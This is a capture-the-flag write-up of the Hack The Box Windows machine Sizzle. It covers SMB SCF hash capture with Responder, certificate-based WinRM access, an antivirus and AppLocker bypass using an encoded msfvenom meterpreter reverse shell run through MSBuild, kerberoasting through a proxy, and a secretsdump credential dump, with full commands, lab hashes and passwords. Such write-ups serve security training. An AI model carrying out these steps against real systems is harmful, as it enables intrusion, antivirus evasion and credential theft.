Sizzle was a great machine, everything was great. It was very realistic, fun and of course challenging. Personally one of my favorites and one of the best Active Directory boxxes I have ever solved. It starts with getting write access to a folder in an smb share, a simple scf file attack with responder and john can give me a password for a user. With that password, I was able to generate a certificate request and get a certificate and then a WinRm session. After that comes the most challenging part of the box that bypasses antivirus, kerberoasting, and privilege escalation, but before we do that, we’ll take an unintentional look at it first. That was the box for short, it’s a Windows box and the IP is 10.10.10.103, I added it to / etc / hosts like sizzle.htb.
Nmap
As always, first an nmap scan
root @ kali: ~ / htb / sizzle # nmap -sV -sT -sC sizzle.htb Starting Nmap 7.80 (https://nmap.org) at 2020-01-02 06:30 EST Nmap scan report for sizzle.htb (10.10.10.103) Host is up (0.12s latency). Not shown: 990 filtered ports PORT STATE SERVICE VERSION 21 / tcp open ftp Microsoft ftpd | _ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | _ SYST: Windows_NT 53 / tcp open domain? | fingerprint strings: | DNSVersionBindReqTCP: | version | _ bind 135 / tcp open msrpc Microsoft Windows RPC 139 / tcp open netbios-ssn Microsoft Windows netbios-ssn 389 / tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName = sizzle.HTB.LOCAL | Subject Alternative Name: othername: <unsupported>, DNS: sizzle.HTB.LOCAL | Not valid before: 2020-01-02T11: 22: 14 | _Not valid after: 2021-01-01T11: 22: 14 | _ssl-date: 2020-01-02T11: 35: 10 + 00: 00; + 1m11s from scanner time. 445 / tcp open microsoft ds? 464 / tcp open kpasswd5? 593 / tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636 / tcp open ssl / ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName = sizzle.HTB.LOCAL | Subject Alternative Name: othername: <unsupported>, DNS: sizzle.HTB.LOCAL | Not valid before: 2020-01-02T11: 22: 14 | _Not valid after: 2021-01-01T11: 22: 14 | _ssl-date: 2020-01-02T11: 35: 09 + 00: 00; + 1m11s from scanner time. 3268 / tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName = sizzle.HTB.LOCAL | Subject Alternative Name: othername: <unsupported>, DNS: sizzle.HTB.LOCAL | Not valid before: 2020-01-02T11: 22: 14 | _Not valid after: 2021-01-01T11: 22: 14 | _ssl-date: 2020-01-02T11: 35: 09 + 00: 00; + 1m11s from scanner time. 1 service unrecognized despite returning data. If you know the service / version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service: SF-Port53-TCP: V = 7.80% I = 7% D = 1/2% Time = 5E0DD478% P = x86_64-pc-linux-gnu% r (DNSVe SF: rsionBindReqTCP, 20, "\ 0 \ x1e \ 0 \ x06 \ x81 \ x04 \ 0 \ x01 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ x07version \ x SF: 04bind \ 0 \ 0 \ x10 \ 0 \ x03 "); Service Info: Host: SIZZLE; OS: Windows; CPE: cpe: / o: microsoft: windows Host script results: | _clock-skew: mean: 1m10s, deviation: 0s, median: 1m10s | smb2-security-mode: | 2.02: | _ Message signing enabled and required | smb2-time: | date: 2020-01-02T11: 34: 31 | _ start_date: 2020-01-02T11: 31: 19 Service detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 228.22 seconds root @ kali: ~ / htb / sizzle #
We have many ports, we have ftp on port 21, dns on port 53, http on port 80, smb and ldap. We also see that the domain is HTB.LOCAL and commonName is sizzle.htb.local so I added it to / etc / hosts:
HTTP
I checked the http server and the index only had this gif:
Then I turned gobuster en DirB
root @ kali: ~ / htb / sizzle # gobuster dir -u http://10.10.10.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 ================================================== ============= Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) ================================================== ============= [+] Url: http://10.10.10.103 [+] Threads: 40 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster / 3.0.1 [+] Timeout: 10s ================================================== ============= 2020/01/02 06:33:35 Starting gobuster ================================================== ============= / images (Status: 301) / Images (Status: 301) / IMAGES (Status: 301)
root @ kali: ~ / htb / sizzle # dirb http://10.10.10.103 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Jan 2 07:48:37 2020 URL_BASE: http://10.10.10.103/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.103/ ---- ==> DIRECTORY: http://10.10.10.103/aspnet_client/ ==> DIRECTORY: http://10.10.10.103/certenroll/ + http://10.10.10.103/certsrv (CODE: 401 | SIZE: 1293)
/certenroll
seems interesting, but is unfortunately prohibited:
Time to check smb.
SMB, SCF File Attack, Amanda’s Credentials
The first thing we need to know are the “shares”, we can use smbclient to list the “shares”:
smbclient --list //sizzle.htb/ -U ""
I noticed that there was a share for Active Directory Certificate Services. Most likely / certsrv is on the web server:
http://sizzle.htb/certsrv
root@kali:~/htb# smbclient //sizzle.htb/"Department Shares" -U "" WARNING: The "syslog" option is deprecated Enter WORKGROUP\'s password: Try "help" to get a list of possible commands. smb: \>
There were many directories, but 2 that allowed writing: ZZ_ARCHIVE
and Users/Public
.
We are looking for references. Since we can write to any of the folders, we may be able to apply an scf file attack. You can go here . read over. We are going to put an scf
file in Users/Public
. It looks like this:
Then we will perform responder. When a user browses through that folder, he automatically tries to connect to my box via smb, that’s when responder catches the hashes. More info in the link above.
root @ kali: / tmp # responder -I tun0 __ . ----. -----. -----. -----. -----. ----- .-- | |. ----- .----. | _ | -__ | __ - | _ | _ | | _ || -__ | _ | | __ | | _____ | _____ | __ | _____ | __ | __ | _____ || _____ | __ | | __ | NBT-NS, LLMNR & MDNS Responder 2.3.4.0 -cut- [+] Generic Options: Responder NIC [tun0] Responder IP [10.10.16.70] Challenge set [random] Don't Respond To Names ['ISATAP'] [+] Listening for events ... [SMB] NTLMv2-SSP Client: 10.10.10.103 [SMB] NTLMv2-SSP Username: HTB \ amanda [SMB] NTLMv2-SSP Hash: amanda :: HTB: a6d23653a4821fc8: 03851040934EDC44A5A58C61B9C048AE: [*] Skipping previously captured hash for HTB \ amanda
responder captured hash for a user named Amanda. Let’s crack it with John:
The password is Ashare1972
Requesting a Certificate, WinRm Session as amanda
I tried to access certenroll as amanda and it worked fine
root @ kali: ~ / htb / sizzle # smbclient //sizzle.htb/"CertEnroll "-U amanda
Enter WORKGROUP \ amanda's password: Ashare1972
Try" help "to get a list of possible commands. smb: \> ls . D 0 Tue Jun 30 13:47:19 2020 .. D 0 Tue Jun 30 13:47:19 2020 HTB-SIZZLE-CA+.crl A 721 Tue Jun 30 13:47:19 2020 HTB-SIZZLE-CA.crl A 909 Tue Jun 30 13:47:19 2020 nsrev_HTB-SIZZLE-CA.asp A 322 Mon Jul 2 16:36:05 2018 sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt A 871 Mon Jul 2 16:36:03 2018
So I went to /certsrv
and used amanda
’s credentials to authenticate
Now it is time to get a certificate. But wait, what is the certificate for?
A full full nmap
scan shows that WinRm
ports are open:
nmap -p- -T5 -vvv --max-retries 1 sizzle.htb
nmap -p 5985,5986 -sV -sT -sC sizzle.htb
Port 5985 uses http while 5986 uses https. When I got the data from Amanda I tried to connect to port 5985 and it didn’t work so we do it through port 5986 which is why we need a certificate. (If you don’t know how to connect via WinRm, we’ll get to that later.)
We’ll generate a certificate request and a private key:
openssl req -newkey rsa:2048 -nodes -keyout request.key -out request.csr
Then we will make an advanced certificate request, paste our request and download the certificate (base64 encoded)
Now we can use WinRm, but what is WinRm
?
I used Alamot’s shell and added some for the certificate and key:
root @ kali: ~ / htb / sizzle # cat htb-sizzle-winrm.rb #! / usr / bin / ruby require 'winrm' # Author: Alamot conn = WinRM :: Connection.new ( endpoint: 'https://10.10.10.103:5986/wsman', transport:: ssl, client_cert: '/root/htb/sizzle/certnew.cer', client_key: '/root/htb/sizzle/request.key', : no_ssl_peer_verification => true ) command = "" conn.shell (: powershell) do | shell | until command == "exit \ n" do output = shell.run ("- join ($ id, 'PS', $ (whoami), '@', $ env: computername, '', $ ((gi $ pwd) .Name), '>')" ) print (output.output.chomp) command = gets output = shell.run (command) do | stdout, stderr | STDOUT.print stdout STDERR.print stderr end end puts "Exiting with code # {output.exitcode}" end
And it worked:
But there was no user.txt
:
Stored NTLM Hashes, Secretsdump, Privilege Escalation
Due to file system enumeration I found a file file.txt
in it C:\Windows\System32
. That file had NTLM hashes for all users!
root @ kali: ~ / htb / sizzle # ruby htb-sizzle-winrm.rb PS htb \ amanda @ SIZZLE Documents> type C: \ Windows \ System32 \ file.txt krbtgt: 502: aad3b435b51404eeaad3b435b51404ee: 296ec447eee58283143efbd5d39408c8 ::: Administrator: 500: aad3b435b51404eeaad3b435b51404ee: c718f548c75062ada93250db208d3178 ::: Domain User ID Hash ------ ---- - ---- HTB.LOCAL Guest 501 - amanda: 1104: aad3b435b51404eeaad3b435b51404ee: 7d0516ea4b6ed084f3fdf71c47d9beb3 ::: mrb3n: 1105: aad3b435b51404eeaad3b435b51404ee: bceef4f6fe9c026d1d8dec8dce48adef ::: mrlky: 1603: aad3b435b51404eeaad3b435b51404ee: bceef4f6fe9c026d1d8dec8dce48adef ::: PS htb \ amanda @ SIZZLE Documents>
I honestly don’t know why. After resetting the machine, the file was still there. I don’t know if the creator made an accidental mistake, but at least let’s see how we can use that.
That admin hash was useless, I tried with SMB, I cracked it, tried Psexec. It did not work. I cracked mrlky’s hash:
The password was Football # 7 , I used it with secretsdump.py from impacket and got another hash from the administrator:
root@kali:~/htb# secretsdump.py -just-dc mrlky@sizzle.htb.local Impacket v0.9.22.dev1+20200629.145357.5d4ad6cc - Copyright 2020 SecureAuth Corporation Password:Football#7 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3::: mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef::: sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de::: SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:90fff1f794a2c3b1b2cd892a1f48c7fb::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d Administrator:aes128-cts-hmac-sha1-96:45b1a7ed336bafe1f1e0c1ab666336b3 Administrator:des-cbc-md5:ad7afb706715e964 krbtgt:aes256-cts-hmac-sha1-96:0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e krbtgt:aes128-cts-hmac-sha1-96:668b69e6bb7f76fa1bcd3a638e93e699 krbtgt:des-cbc-md5:866db35eb9ec5173 amanda:aes256-cts-hmac-sha1-96:60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb amanda:aes128-cts-hmac-sha1-96:48d91184cecdc906ca7a07ccbe42e061 amanda:des-cbc-md5:70ba677a4c1a2adf mrlky:aes256-cts-hmac-sha1-96:b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155 mrlky:aes128-cts-hmac-sha1-96:3daab3d6ea94d236b44083309f4f3db0 mrlky:des-cbc-md5:02f1a4da0432f7f7 sizzler:aes256-cts-hmac-sha1-96:85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d sizzler:aes128-cts-hmac-sha1-96:e31015d07e48c21bbd72955641423955 sizzler:des-cbc-md5:5d51d30e68d092d9 SIZZLE$:aes256-cts-hmac-sha1-96:030d88489850a42ac3e92454f7a66f61189450943a2d9836d7b376e5236e12c5 SIZZLE$:aes128-cts-hmac-sha1-96:9032103c089fb008ad9cde29b3a6132f SIZZLE$:des-cbc-md5:f81a64e0a1a20eb5 [*] Cleaning up...
It wasn’t cracking, I tried the psexec metasploit module and for some reason it didn’t work so I used the hash with smb to access C $ then downloaded the flags.
root @ kali: ~ / htb / sizzle # smbclient //sizzle.htb/C$ -U "Administrator" --pw-nt-hash f6b7160bfc91823792e0ac3a162c9267 Try "help" to get a list of possible commands. smb: \> cd users smb: \ users \> cd administrator smb: \ users \ administrator \> cd desktop smb: \ users \ administrator \ desktop \> ls . DR 0 Tue Jul 10 18:24:52 2018 .. DR 0 Tue Jul 10 18:24:52 2018 desktop.ini AHS 282 Mon Jul 2 23:00:22 2018 root.txt A 32 Tue Jul 10 18:24:58 2018 smb: \ users \ administrator \ desktop \>
Now forget that we saw that, Let’s try something more realistic.
Backtrack
Back to the WinRm
session as amanda
, let’s examine our environment.
There was AppLocker:
Antivirus:
We were even in Constrained Language Mode in PowerShell:
Since this was an Active Directory environment I wanted to do kerberoasting, but Invoke-Kerberoast.ps1
needed Full Language Mode, I couldn’t use GetUserSPNs.py
because the services were internal only. And my attempts to evade the antivirus failed. I could bypass the constrained language mode with PSByPassCLM and still couldn’t use
Invoke-Kerberoast.ps1
. AppLocker is easy to bypass so it wasn’t an issue. But I had to bypass the antivirus.
Bypassing AV
CLM / AppLocker Break Out
Enumeration
The shell I have is quite limited. I can see that I’m in constrained language mode, and that AppLocker is limiting what I can run.
PS htb\amanda@SIZZLE v2.0.50727> $executioncontext.sessionstate.languagemode
ConstrainedLanguage
PS htb\amanda@SIZZLE Documents> Get-AppLockerPolicy -Effective -XML
I found this article and this POC
First time I created the payload like this:
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=1339 -f csharp
And I added the shellcode to the POC and applied the exploit:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\windows\system32\spool\drivers\color\shellcode.xml
The antivirus detected it. I added an encoder and 100 iterations and tried again:
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=1339 -e x86/shikata_ga_nai -i 100 -f csharp
Then I added the shellcode to shellcode.xml
shellcode.xml
: https://github.com/puckiestyle/pentest/blob/master/shellcode.xml
root @ kali: ~ / htb / sizzle # python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.103 - - [02 / Jan / 2020 09:45:17] "GET /shellcode.xml HTTP / 1.1" 200 -
PS htb \ amanda @ SIZZLE color> Invoke-WebRequest -o shellcode.xml http://10.10.16.70/shellcode.xml PS htb \ amanda @ SIZZLE color> c: \ Windows \ Microsoft.NET \ Framework \ v4.0.30319 \ MSBuild.exe c: \ windows \ system32 \ spool \ drivers \ color \ shellcode.xml Microsoft (R) Build Engine version 4.6.1586.0 [Microsoft .NET Framework, version 4.0.30319.42000] Copyright (C) Microsoft Corporation. All rights reserved. Build started 1/2/2020 9:52:59 AM.
This time it worked, and I got a meter preter session!
msf5 exploit (multi / handler)> exploit [*] Started reverse TCP handler on 10.10.16.70:1339 [*] Sending stage (179779 bytes) to 10.10.10.103 [*] Meterpreter session 1 opened (10.10.16.70:1339 -> 10.10.10.103:57175) at 2020-01-02 09:51:50 -0500 meterpreter> sysinfo Computer: SIZZLE OS: Windows 2016 (Build 14393). Architecture: x64 System Language: en_US Meter preter: x86 / windows meter preter>
Kerberoasting, Privilege Escalation
Now we have a meterpreter
session, we can route the internal subnet, use a proxy then use GetUserSPNs.py
and see if any user is kerberoastable.
First thing is to configure proxychains
to use port 8080:
/etc/proxychains.conf
Then we will use auxiliary/server/socks4a
to add the route and set up the proxy:
route add 10.10.10.0 255.255.255.0 1
this adds a route of the whole internal subnet where 1
is the session number.
Now we are ready. Let’s kerberoast!
root @ kali: ~ / htb / sizzle # proxychains GetUserSPNs.py -request -dc-ip 10.10.10.103 HTB.LOCAL / amanda: Ashare1972 ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation | S-chain | - <> - 127.0.0.1:9050-<><>-10.10.10.103:389-<><>-OK ServicePrincipalName Name MemberOf PasswordLastSet LastLogon -------------------- ----- ------------------------- ---------------------------- ---------------------- ---- -------------------------- http / sizzle mrlky CN = Remote Management Users, CN = Builtin, DC = HTB, DC = LOCAL 2018-07-10 14: 08: 09.536421 2018-07-12 10: 23: 50.871575 | S-chain | - <> - 127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK | S-chain | - <> - 127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK | S-chain | - <> - 127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK $ krb5tgs $ 23 $ * mrlky $ HTB.LOCAL $ http / sizzle * $ 74c34fa35f660924e4aee5fe2a825cbb $ 2912898f4e75794e6750066f47fb2ebcf0b320282ca6b9ff00b0572b39f45795a6d8367d2bbd073e18e8a669117d4e6dd2af17201e7466adadcecef7dccc52b31d553b9064aabf7de0e2200f2b4edcb214e198c1082cb65879dad99e4be078c9621a2f75a34e5175bad3a22b5c8f453caa957e35ef3698d758c4e5648b9b7a2046aed03bf772beb11e48c223c432263fda8aeacacc5a06cdb40d77ade4b5f3346ce37fdad2d346b79be4adc0ff7c7c59413c5083cfddcec1263685af7eb088d7a51803f5761a4e4b232f84bd24df54ec4bad85b57b12d865f0969b0871d038dc5f8acac9acd1592c41b39c4c027f991c96d0d869f00cfab092311baff1d9ba880c858c678e486453775223746a01a6c893f74a3ff13e972a909b72b842561505b6ec74dedb2a5046184d3b3a6445a2f65c3715db38379d50f542c77fd297b26fd22f30f3198006774044afa48336ec8f4c539f296128b861e4e67767921b7c2ab149ae5d415098086e4e23ff305b684f078bc7a89fca3ebefd5a7f3d189cd6ae10176dc9b8fef8e6a93a6d820ad11948247d130647d3453df0755ccc1450c188ed3894b270fd052934674626d8685df1f12e32cbf2cf60a1c9940a68bb0e89e70ffb2211f6d758be7442ba13d6646b4afecdede2fb2449b96101709e16757c2c7e1366e4aea3 root @ kali: ~ / htb / sizzle #
User mrlky
was kerberoastable and we have a hash, let’s give this to john
:
root @ kali: ~ / htb / sizzle # john --wordlist = / usr / share / wordlists / rockyou.txt mrlky.hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Football # 7 (?) 1g 0: 00: 00: 20 DONE (2020-01-02 10:16) 0.04780g / s 533806p / s 533806c / s 533806C / s Forever29Life05..Fokatrepa Use the "--show" option to display all of the cracked passwords reliably Session completed
The password is Football#7
, now we can reuse secretdump.py and do the same as before:
root @ kali: ~ / htb / sizzle # secretsdump.py sizzle.htb.local / mrlky: Football#7@sizzle.htb.local Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain \ uid: rid: lmhash: nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator: 500: aad3b435b51404eeaad3b435b51404ee: f6b7160bfc91823792e0ac3a162c9267 ::: Guest: 501: aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0 ::: krbtgt: 502: aad3b435b51404eeaad3b435b51404ee: 296ec447eee58283143efbd5d39408c8 ::: DefaultAccount: 503: aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0 ::: amanda: 1104: aad3b435b51404eeaad3b435b51404ee: 7d0516ea4b6ed084f3fdf71c47d9beb3 ::: mrlky: 1603: aad3b435b51404eeaad3b435b51404ee: bceef4f6fe9c026d1d8dec8dce48adef ::: sizzler: 1604: aad3b435b51404eeaad3b435b51404ee: d79f820afad0cbc828d79e16a6f890de ::: SIZZLE $: 1001: aad3b435b51404eeaad3b435b51404ee: 0979e102285334d59af1854ac247db8b ::: [*] Kerberos keys grabbed Administrator: aes256-cts-hmac-sha1-96: e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d Administrator: aes128-cts-hmac-sha1-96: 45b1a7ed336bafe1f1e0c1ab666336b3 Administrator: des-cbc-md5: ad7afb706715e964 krbtgt: aes256-cts-hmac-sha1-96: 0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e krbtgt: aes128-cts-hmac-sha1-96: 668b69e6bb7f76fa1bcd3a638e93e699 krbtgt: des-cbc-md5: 866db35eb9ec5173 amanda: aes256-cts-hmac-sha1-96: 60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb amanda: aes128-cts-hmac-sha1-96: 48d91184cecdc906ca7a07ccbe42e061 amanda: des-cbc-md5: 70ba677a4c1a2adf mrlky: aes256-cts-hmac-sha1-96: b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155 mrlky: aes128-cts-hmac-sha1-96: 3daab3d6ea94d236b44083309f4f3db0 mrlky: des-cbc-md5: 02f1a4da0432f7f7 sizzler: aes256-cts-hmac-sha1-96: 85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d sizzler: aes128-cts-hmac-sha1-96: e31015d07e48c21bbd72955641423955 sizzler: des-cbc-md5: 5d51d30e68d092d9 SIZZLE $: aes256-cts-hmac-sha1-96: b2fdd1cec387ef3bee7799b798b665df34acd3b8f3fc15ef8d5e621e77abc5dd SIZZLE $: aes128-cts-hmac-sha1-96: b17b20014028f2d7f99d03bc5f8c2d1f SIZZLE $: des-cbc-md5: 6b45e586077a4f57 [*] Cleaning up ...
That is it !
Author – Puckiestyle